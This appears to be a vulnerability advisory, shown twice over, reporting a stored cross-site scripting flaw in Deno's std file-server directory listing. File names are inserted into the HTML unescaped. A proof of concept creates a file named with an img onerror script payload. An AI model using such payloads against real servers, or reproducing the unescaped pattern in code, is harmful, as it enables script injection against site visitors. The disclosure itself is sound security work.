Summary
http/file-server's serveDir with showDirListing: true option is XSS-able by a user who can control file names in the source directory on systems with POSIX file names. Might also be possible on other systems but less trivial due to e.g. lack of file name support for <> in Windows.
Details
|
return `<a href="${link}">${path}</a>`; |
and
|
<a href="${entry.url}">${entry.name}</a> |
PoC
On Linux:
// main.ts
import { serveDir } from '@std/http/file-server'
Deno.serve((req) => serveDir(req, {
showDirListing: true,
}))touch "./<img src=x onerror=alert(1)>"
deno run -RN main.ts
Then visit route /.
Impact
The usages of serveDir with showDirListing: true are affected when the directory being served has end-user-writable file names.
lionel-rowe Reporter
Summary
http/file-server'sserveDirwithshowDirListing: trueoption is XSS-able by a user who can control file names in the source directory on systems with POSIX file names. Might also be possible on other systems but less trivial due to e.g. lack of file name support for<>in Windows.Details
std/http/file_server.ts
Line 507 in 065296c
and
std/http/file_server.ts
Line 532 in 065296c
PoC
On Linux:
touch "./<img src=x onerror=alert(1)>" deno run -RN main.tsThen visit route
/.Impact
The usages of
serveDirwithshowDirListing: trueare affected when the directory being served has end-user-writable file names.